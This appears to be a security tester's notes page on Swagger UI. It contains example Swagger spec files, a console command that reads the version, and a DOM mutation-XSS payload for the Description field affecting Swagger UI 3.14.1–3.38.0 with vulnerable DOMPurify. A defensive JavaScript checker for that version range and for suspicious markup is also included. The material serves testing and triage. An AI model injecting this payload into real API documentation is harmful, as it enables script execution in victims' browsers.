Swagger UI

Version

In the browser console:

JSON.stringify(versions['swaggerUi']['version'])

Documentation example files

api.json

{
  "swagger": "2.0",
  "info": {
    "title": "Example json.spec",
    "description": "Description Text"
  },
  "paths": {
    "/accounts": {
      "get": {
        "tags": ["accounts"],
        "summary": "Finds all accounts",
        "operationId": "findAccounts",
        "responses": {
          "200": {
            "description": "No response was specified"
          }
        }
      }
    }
  }
}

api.yaml

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    Description Text
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

DOM XSS

Swagger UI 3.14.1 - 3.38.0 with a vulnerable DOMPurify version

  • DOM Mutation XSS with namespace confusion in Description field

    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title=\"</textarea><img src='#' onerror='alert(window.origin)'>\">
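
A triage check for the affected range above, added here as an example and not part of the original notes: it tests a version string as returned by the console command and lists `description` fields in a parsed spec that contain namespace-switching elements or inline event handlers. The function names, the pattern list and the sample spec are assumptions constructed for illustration.

```javascript
// Added example. Affected range as stated on this page: Swagger UI 3.14.1 - 3.38.0.
const AFFECTED = { min: [3, 14, 1], max: [3, 38, 0] };

// Parse "3.20.5" (optionally quoted, as JSON.stringify returns it) into [3, 20, 5].
function parseVersion(v) {
  const m = /^"?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unrecognised version: ${v}`);
  return m.slice(1).map(Number);
}

function compare(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

function inAffectedRange(version) {
  const v = parseVersion(version);
  return compare(v, AFFECTED.min) >= 0 && compare(v, AFFECTED.max) <= 0;
}

// Heuristic (assumed list): MathML/SVG namespace elements, raw-text elements, inline handlers.
const SUSPICIOUS = /<\s*(math|svg|mglyph|mtext|textarea|script|iframe)\b|\bon[a-z]+\s*=/i;

// Walk the parsed spec and return the paths of description fields with suspicious markup.
function findRiskyDescriptions(node, path = "$", hits = []) {
  if (node && typeof node === "object") {
    for (const [key, value] of Object.entries(node)) {
      const here = `${path}.${key}`;
      if (key === "description" && typeof value === "string" && SUSPICIOUS.test(value)) {
        hits.push(here);
      }
      findRiskyDescriptions(value, here, hits);
    }
  }
  return hits;
}

// Constructed sample spec based on the page's api.json, with a harmless marker element.
const sampleSpec = {
  swagger: "2.0",
  info: { title: "Example json.spec", description: "<math><mtext>marker</mtext></math>" },
  paths: { "/accounts": { get: { responses: { 200: { description: "No response was specified" } } } } },
};

console.log(inAffectedRange('"3.20.5"'), findRiskyDescriptions(sampleSpec));
```

Descriptions may legitimately contain Markdown or simple HTML, so a hit is a prompt for review rather than proof of a payload.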
